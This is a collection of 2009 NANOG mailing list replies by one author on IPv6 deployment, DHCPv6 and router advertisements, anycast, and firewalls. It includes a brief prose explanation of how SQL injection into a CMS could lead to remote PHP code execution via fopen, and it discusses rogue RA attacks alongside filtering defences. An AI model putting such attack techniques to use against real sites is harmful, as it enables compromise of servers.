knowledge of how things actually work. I'm sure we can both think of a few ways to make this not cost a whole lot of TCAM entries, either with protocol support, or in internal implementation specific ways. I can immediately think of two ways that cost no extra TCAM entries. -- Nathan Ward
Re: Where to buy Internet IP addresses
On 3/05/2009, at 7:53 PM, Matthew Moyle-Croft wrote: James Hess wrote: A /62 takes care of that unusual case, no real need for a /56 for the average residential user; that's just excessive. Before wondering about the capabilities of home routers.. one might wonder if there will even be _home_ routers ? I think you'd want to do a /60 so it's on a nibble boundary. But by then you might as well do a /56. My personal feeling is that 99% of home networks will use a single / 64, but we'll be giving out /60s and /56s to placate the 1% who are going to jump up and down and shout at us about it because of some reason that they feel makes it all unfair or that we're thinking like ipv4 not ipv6 etc. 17% of packets leaving an ISP here in NZ were from behind double NAT. (or, they went through 2 routing hops in the home, which I suspect is fairly rare) Why does this happen? $customer has an ADSL router with no wireless, then they go buy a wireless router and plug the ADSL router in to the internet port. I suspect your market is not that different to NZ. It's possible that home networks will gain some ability (in a standard fashion) to use more than one /64, but I doubt it - it's much easier to do resource discovery on a single broadcast domain for things like printers, file sharing etc. The above mentioned sort of stuff will keep happening, I'm sure, and because the ADSL router and the wireless router are the only devices on the same subnet, no service discovery things need to happen. I have an idea brewing to allow routers to forward PD requests. The idea would be that a BRAS/LNS only assigns a /64 for each PD request, and the customer router forwards PD requests for routers attached to their inside interface. That way, we can chain up to 16 subnets in the home. The BRAS can reserve a /60 or /56 or whatever for each customer so they are contiguous, or whatever. -- Nathan Ward
Re: one shot remote root for linux?
On 29/04/2009, at 3:25 PM, Nathan Ward wrote: On 29/04/2009, at 3:10 PM, Crooks, Sam wrote: Cisco ASA's appear to be linux under the hood based on watching versions of ASA804-3/12/19/23/31 boot on the console They are Linux, and run two copies of IOS simultaneously in a VM each. Erk, sorry, I brain farted and was thinking of the ASR. I'm really not sure about the ASA product line. -- Nathan Ward
Re: Study of IPv6 Deployment
On 29/04/2009, at 5:30 AM, Harald Firing Karlsen wrote: Please check out the following link with some information/statistics from a LAN-party taking place in Norway (yeah, Norway is in Europe, not North America, but it stills give an overview): http://technet.gathering.org/?p=121 There were over 5000 computers in the arena and of those 47% had a valid and working IPv6 address. They was also provided with IPv4 and no NAT at all. The only ports being closed outbound was 25, 135-139 and 445. Google over IPv6 was enabled for the event as well, so a lot of the traffic was towards google. Did you have any problems that you encountered? Poorly behaving IPv6 stacks, rogue RA+SLAAC/DHCPv6, etc.? Do you have any netflow logs from the event? -- Nathan Ward
Re: one shot remote root for linux?
On 29/04/2009, at 3:10 PM, Crooks, Sam wrote: Cisco ASA's appear to be linux under the hood based on watching versions of ASA804-3/12/19/23/31 boot on the console They are Linux, and run two copies of IOS simultaneously in a VM each. Kind of like how VMWare ESX is Linux - technically it is, but you don't really treat it as such. -- Nathan Ward
Re: Problems reaching tools.ietf.org?
On 25/04/2009, at 12:45 AM, Jack Bates wrote: Anyone seeing issues with reachability for tools.ietf.org in IPv6? v4 works fine for me, but oh, the timeouts. :( Tracing the route to tools.ietf.org (2001:1890:1112:1:214:22FF:FE1F: 1E54) 1 bnet6-2.tunnel.tserv2.fmt.ipv6.he.net (2001:470:1F03:1031::1) 64 msec 64 msec 64 msec 2 1g-3-9.core1.fmt1.ipv6.he.net (2001:470:0:44::3) 76 msec 72 msec 76 msec 3 10gigabitethernet1-1.core1.pao1.he.net (2001:470:0:2E::2) 64 msec 64 msec 64 msec 4 10gigabitethernet2-4.core1.ash1.he.net (2001:470:0:35::2) 144 msec 140 msec 140 msec 5 ibr01-ve96.asbn01.occaid.net (2001:504:0:2:0:3:71:1) 140 msec 140 msec 140 msec 6 r1.flpnj.ipv6.att.net (2001:4830:E2:2B::2) 148 msec 148 msec 148 msec 7 2001:1890:61:9117::2 224 msec 228 msec 224 msec 8 2001:1890:61:9117::2 !H * * I'm betting you are on 6to4. 6to4 has never worked for me, reaching tools.ietf.org. -- Nathan Ward
Re: NAT64/NAT-PT update in IETF, was: Re: Important New Requirement for IPv4 Requests [re impacting revenue]
On 24/04/2009, at 12:14 AM, Pekka Savola wrote: On Thu, 23 Apr 2009, Nathan Ward wrote: After trying to participate on mailing lists for about 2 or 3 years, it's pretty hard to get anything done without going to meetings. Just participating in mailing lists is good for keeping up to date, but not so good for getting things changed. That's what I've found, anyway. Might not always be true. If you were to go to meetings, you would realize that it won't help in gettings things changed significantly better than active mailing list participation would... :-/ I got heaps done in SFO - to the point where I'm happy to pay to get to Stockholm and Hiroshima later this year (I'm self employed, and live at the end of the world, so for me it's harder than most who just have to convince the boss :-). -- Nathan Ward
Re: Broadband Subscriber Management
On 24/04/2009, at 12:23 AM, William McCall wrote: My understanding of the PPPoA/E deal is that SPs (originally) wanted to prevent some yahoo with a DSL modem from just being able to hook in to someone's existing DSL connection and using it, so they decided to implemement PPPoA and require some sort of authentication to prevent this scenario. Also, DSL was the upgrade from dialup in many places, and dialup is generally PPP. For ISPs, the re-engineering required north of the last mile is much less, particularly in the billing/accounting systems that no one wants to touch because they were written by that coder who left a few years ago and work just fine. -- Nathan Ward
Re: IPv4 Anycast?
On 22/04/2009, at 6:53 PM, Zhenkai Zhu wrote: Hello NANOG, I noticed that more than 3K prefixes are with 2 Origin ASes. Are they the simplest cases of anycast? Or they are mainly due to misconfiguration? The third (and probably more likely) option is that the prefixes are advertised by two providers as the customer wants redundancy with their own IP space, but does not have a public ASN. Ie. the customer has a circuit and possibly a BGP feed to two different providers. -- Nathan Ward
Re: IPv4 Anycast?
On 22/04/2009, at 7:12 PM, Zhenkai Zhu wrote: Ah, that's very possible. So I suppose the 90 prefixes with 3 origin ASes are due to the same reason.. Then there is basically no inter-As anycast besides the anycast prefix for DNS root, since I only noticed like 8 prefixes that are announced by more than 3 ASes.. I never said that was the only reason, I'm sure plenty of people are doing anycast with different originating ASes. For example, check the 192.88.99.0/24 prefix. -- Nathan Ward
Re: NAT64/NAT-PT update in IETF, was: Re: Important New Requirement for IPv4 Requests [re impacting revenue]
On 23/04/2009, at 8:12 AM, Jack Bates wrote: Iljitsch van Beijnum wrote: In v6ops CPE requirements are being discussed so in the future, it should be possible to buy a $50 home router and hook it up to your broadband service or get a cable/DSL modem from your provider and the IPv6 will be routed without requiring backflips from the user. So there is a fair chance that we'll be in good shape for IPv6 deployment before we've used up the remaining 893 million IPv4 addresses. I think this annoys people more than anything. We're how many years into the development and deployment cycle of IPv6? What development cycle is expected out of these CPE devices after a spec is FINALLY published? If the IETF is talking future and developers are also talking future, us little guys that design, build, and maintain the networks can't really do much. I so hope that vendors get sick of it and just make up their own proprietary methods of doing things. Let the IETF catch up later on. This work is actually mostly being done by some guys at Cisco, and other vendors have plenty of input as well. I would be surprised if CPEs that support the outcome of this work are far behind the RFC being published (or even a late draft). -- Nathan Ward
Re: Important New Requirement for IPv4 Requests
On 23/04/2009, at 3:33 AM, Joe Abley wrote: However, I take some small issue with the assertion that FTP is easier to script than HTTP. The only way I have ever found it easy to script FTP (outside of writing dedicated expect scripts to drive clients, which really seems like cheating) is to use tools like curl, and I don't see why HTTP is more difficult than FTP as a protocol in that case. Perhaps I'm missing something. It looks like curl can upload stuff (-d @file) but you have to have something on the server to accept it. FTP sounds easier. -- Nathan Ward
Re: Malicious code just found on web server
On 21/04/2009, at 5:23 AM, Mike Lewinski wrote: Paul Ferguson wrote: Most likely SQL injection. At any given time, there are hundreds of thousands of legitimate websites out there that are unwittingly harboring malicious code. Most of the MS-SQL injection attacks we see write malicious javascript into the DB itself so all query results include it. However, I'm not sure how easy it is to leverage to get system access - we've seen a number of compromised customer machines and there didn't appear to be any further compromise of them beyond the obvious. In the OP's case it sounds like static HTML files were altered. My bet is that an ftp or ssh account was brute forced. I have seen a couple of open source web apps (CMSs, etc.) that store names of php files in a database, and those files names are then opened with fopen. SQL injection could be used to write a URL in to the database, and then wait for that entry to be called, and viola, you can execute php code, or whatever. Obviously that is relevant to the first part of your reply - it would not work with static content. -- Nathan Ward
Re: ADMIN: Reminder on off-topic threads
On 22/04/2009, at 3:57 PM, Joe Greco wrote: It may not be wise to wait until ARIN allocates 256.0.0.0/8 to someone and everyone chimes in to note that their routers are barfing on that. :-/ Now that *would* be amusing. -- Nathan Ward
Re: IXP
On 18/04/2009, at 12:08 PM, Paul Vixie wrote: i should answer something said earlier: yes there's only 14 bits of tag and yes 2**14 is 4096. in the sparsest and most wasteful allocation scheme, tags would be assigned 7:7 so there'd be a max of 64 peers. it's more likely that tags would be assigned by increment, but it's still nowhere near enough for 300+ peers. however, well before 300 peers, there'd be enough staff and enough money to use something other than a switch in the middle, so that the tagspace would be per-port rather than global to the IXP. Q in Q is not how i'd build this... cisco and juniper both have hardware tunnelling capabilities that support this stuff... it just means as the IXP fabric grows it has to become router-based. On Alcatel-Lucent 7x50 gear, VLAN IDs are only relevant to that local port. If you want to build a VLAN that operates like it does on a Cisco switch or something, you set up a tag on each port, and join the tags together with a L2 switching service. The tag IDs can be different on each port, or the same... it has no impact. -- Nathan Ward
Re: Fiber cut in SF area
On 14/04/2009, at 11:35 AM, David Barak wrote: In addition, as has been noted, this system wouldn't PREVENT a failure, it would just give you some warning that a failure may be coming, probably by a matter of minutes. Some statistics about the effectiveness of car alarms and unmonitored house alarms would probably be useful here. Whack a $5 12v horn on it, and my bet is that it'd become a deterrent pretty quickly. -- Nathan Ward
Re: Verizon EVDO Issues
On 8/04/2009, at 10:27 PM, Alexander Harrowell wrote: Do they maintain a continuous data link in normal operation (like, say, connectivity for a LAN, or backhaul for a camera or some such), or do they request the data link when they need to send [whatever] (like a discrete SCADA system)? My (user only) experience is that cellular data service doesn't handle long sessions well. I've had great success with it. We have done live audio streaming over IP through a cellular service before. 64kbps ogg encoding. About 7 or so hours in one session. We used to do a cheap live broadcast from an outdoor event for a radio station. -- Nathan Ward
Re: ACLs vs. full firewalls
On 8/04/2009, at 10:32 AM, Karl Auer wrote: I'd be interested to hear why people use firewalls. I've never felt the need, myself - am I living in a fool's paradise? End hosts are not always trustworthy. If a host is compromised, should it be able to send anything and everything out to the public network? If a host is a desktop PC controlled by an end user, should it be able to send and receive anything it wants? IMO, host based filtering and ACLs (either firewalls or router ACLs or whatever) in the network should both be used. They fulfil different needs. -- Nathan Ward
Re: Google Over IPV6
On 27/03/2009, at 11:20 AM, Florian Weimer wrote: Google seems to aim at Tier 1 status for IPv6. No transit, no tunneling. That seems to be the case, yep. It's an interesting plan. On 27/03/2009, at 8:03 AM, Robert D. Scott wrote: Their press would indicate that more than www is IPV6. Yep. Map tiles over IPv6 was turned on last week during the Google IPv6 Implementers meeting, and other stuff is IPv6 as well. The traffic jump was pretty big :-) [nw...@dhcp-12df.meeting.ietf.org]~% host -t www.gmail.com | grep IPv6 googlemail.l.google.com has IPv6 address 2001:4860:b003::53 [nw...@dhcp-12df.meeting.ietf.org]~% host -t maps.google.com | grep IPv6 maps.l.google.com has IPv6 address 2001:4860:b003::68 [nw...@dhcp-12df.meeting.ietf.org]~% host mt0.google.com | grep IPv6 mt.l.google.com has IPv6 address 2001:4860:b003::88 mt.l.google.com has IPv6 address 2001:4860:b003::be mt.l.google.com has IPv6 address 2001:4860:b003::5b mt.l.google.com has IPv6 address 2001:4860:b003::5d etc. etc. (mt[0-3].google.com are the same) -- Nathan Ward
Re: switch speed question
On 26/02/2009, at 2:48 AM, David Barak wrote: Doesn#39;t that assume that the communicarion is unidirectional? ... No. If two hosts are exchanging 1Gbps flows, the traffic across the bus will be 2Gbps, right? Yes. 1Gbps backplane impact per host. You have two hosts, right? One host per port? That's 1Gbps per port. So, 24 ports = 24Gbps, right? Let's try look at it another way: - A 24 port gig switch can receive at most 24Gbps. - That same switch can transmit at most 24Gbps. You don't get to add transmit and receive together to get 48Gbps. Packets don't go across the backplane once to receive, and then once more to transmit. They go across once, from the receiving port to the transmitting port. (sure, sometimes perhaps packets do go across twice, but not normally) And of course, this doesn#39;t include any bus-intensive operations like multicast or things which require cpu processing - those can consume a lot more resources than the input rate of the port. Of course multicast/broadcast consumes more resources than the input rate. That's the point. If you receive multicast or broadcast at 1Gbps, and the multicast needs to go out all the ports, you need to transmit at 24Gbps. That's 24 x the transmit resources (and probably backplane resources, depending on architecture etc. etc.) than a single 1Gbps unicast stream. Of course, with unicast it is only getting to one host. Let's assume we have data at 1Gbps that we need to get to 24 hosts. - If we unicast, we need 24 input ports, and 24 output ports, assuming we only have gig ports (or say 3x10GE, or whatever). - If we multicast, we need 1 input port, and 24 output ports. When you compare the end result, multicast uses significantly less resources, right? In fact, perhaps some bus architectures know about how multicast works, and it consumes *less* resources than doing the same thing with many unicast streams. If the bus does not know about multicast, then the bus would treat it as 24 unicast streams, surely. -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:08 AM, Chuck Anderson wrote: On Wed, Feb 18, 2009 at 12:55:19PM -0700, Aria Stewart wrote: On 18/02/2009 19:39, Kevin Loch wrote: Just how DO we get the message to the IETF that we need all the tools we have in v4 (DHCP, VRRP, etc) to work with RA turned off? What operational reasons are there for working with RA turned off? I don't want any system to be able to get IPv6 addressing information until the system has been identified in our central management system. I also want the IPv6 address assignment to be made centrally. You must have missed my post asking people to be clear in their distinction between RA and SLAAC. I will re-cap: - RA does NOT give your host IPv6 addressing information. - SLAAC gives your host IPv6 addressing information. SLAAC data is carried in RA messages, as an OPTION. - Another RA OPTION is use DHCPv6 to get addressing information. DHCPv6 can operate without RA now. You can send DHCPv6 requests to your local LAN before you get an RA message telling you to do so. This requires you to manually configure your host to do that. That sounds like a waste of time, when you can use RA messages to tell your hosts to use DHCPv6 to get addressing information. Of course, you DHCPv6 does not currently have an option for default router, so your need RA for that. Again, RA is not giving out addressing information, only Hi, I am a router. I suspect this removes the desire for getting VRRP without RA as well for those of you wanting to use DHCPv6 for addressing - RA is not giving out addressing information, and is only giving out Use DHCPv6 bits and a router address. -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:17 AM, valdis.kletni...@vt.edu wrote: 2) Some end-node box with a IPv6 stack from Joe's Software Emporium and Bait-n-Tackle sees an RA packet, and concludes that since RA and DHCPv6 are mutually exclusive, to ignore any DHCPv6 packets it sees, and hilarity ensues. They are not mutually exclusive, DHCPv6 *requires* RA. Or did you mean SLAAC? If you did, I am not sure that they are mutually exclusive - I see no reason for telling hosts a prefix to number out of (SLAAC), and also telling hosts to use DHCPv6. That actually seems like a good solution to a number of problems. -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:15 AM, Randy Bush wrote: What operational reasons are there for working with RA turned off? networks with visitors have shown a serious problem with rouge RAs Networks with visitors have shown a serious problem with rogue DHCP servers. Networks with visitors that use DHCPv6 for address assignment will have the exact same problem if someone comes along with a rogue DHCPv6 server. You need to push your vendors for features to limit where RA messages and DHCPv6 messages can be sent from. Coming up with new ways to solve a problem with an already obvious solution (a solution that we have for an identical problem in IPv4) sounds like it would take longer to solve, and sounds like it would introduce even more confusion in to this space. If your ethernet equipment has the ability to filter on ethernet source/destination then you should be able to do this a little bit now. - Only allow messages to the all routers multicast address to go to the switch interfaces that have routers on them. - Only allow messages to the all DHCPv6 servers multicast address to go to the switch interfaces that have DHCPv6 servers or relays on them. If your ethernet equipment can do IPv6 L4 ACLs then that is even better, you can allow RA messages only from routers, and DHCPv6 responses only from DHCPv6 servers. Again, this is the same problem we have with DHCP in IPv4. The only difference is switch vendor support for filtering these messages. -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:34 AM, Leo Bicknell wrote: Allowing an UNAUTHENTICATED BROADCAST packet to determine where you send your traffic is insane. Rather than moving forward, this is a giantantic step backwards for security and reliability. I guess you don't use DHCP in IPv4 then. It seems there are lots of people who want auto configuration in IPv6 but who clearly do not do this in IPv4. That seems strange, to me. -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:42 AM, sth...@nethelp.no wrote: 2) Some end-node box with a IPv6 stack from Joe's Software Emporium and Bait-n-Tackle sees an RA packet, and concludes that since RA and DHCPv6 are mutually exclusive, to ignore any DHCPv6 packets it sees, and hilarity ensues. They are not mutually exclusive, DHCPv6 *requires* RA. In your previous Nanog message you said: DHCPv6 can operate without RA now. Please make up your mind. You are right, sorry for any confusion, I will clarify my comments. DHCPv6 can operate without RA, but you cannot get default route information right now. I believe there is a draft to add this option though. In most networks this is not practical, as many hosts with a DHCPv6 stack will send DHCPv6 requests only when RA messages tell them to us a DHCPv6 server. The DHCPv6 protocol does not require RA, however practical implementation of DHCPv6 for address assignment does. Better? :-) -- Nathan Ward
Re: IPv6 Confusion
On 19/02/2009, at 9:53 AM, Leo Bicknell wrote: In a message written on Thu, Feb 19, 2009 at 09:44:38AM +1300, Nathan Ward wrote: I guess you don't use DHCP in IPv4 then. No, you seem to think the failure mode is the same, and it is not. Let's walk through this: 1) 400 people get on the NANOG wireless network. 2) Mr 31337 comes along and puts up a rogue DHCP server. 3) All 400 people continue working just fine until their lease expires, which is likely after the conference ends. The 10 people who came in late get info from the rogue server, and troubleshooting ensues. Let's try with IPv6. 1) 400 people get on the NANOG wireless network. 2) Mr 31337 sends a rouge RA. 3) 400 people instantly loose network access. The 10 who come in late don't even bother to try and get on. So, with DHCP handing out a default route we have 10/400 down, with RA's we have 410/410 down. Bravo! Let me clear up something from the start; this is not security. If security is what you are after none of the solutions proffered so far work. Rather this is robust network design. A working device shouldn't run off and follow a new router in miliseconds like a lost puppy looking for a treat. This actually offers a lot of protection from stupidity though. Ever plug an IPv4 router into the wrong switch port accidently? What happened? Probably nothing; no one on the LAN used the port IP'ed in the wrong subnet. They ignored it. Try that with an IPv6 router. About 10 ms after you plug into the wrong port out goes an RA, the entire subnet ceases to function, and your phone lights up like a christmas tree. Let me repeat, none of these solutions are secure. The IPv4/DHCP model is ROBUST, the RA/DHCPv6 model is NOT. Yup, understood. The point I am making is that the solution is still the same - filtering in ethernet devices. Perhaps there needs to be something written about detailed requirements for this so that people have something to point their switch/etc. vendors at when asking for compliance. I will write this up in the next day or two. I guess IETF is the right forum for publication of that. Is there something like this already that anyone knows of? -- Nathan Ward
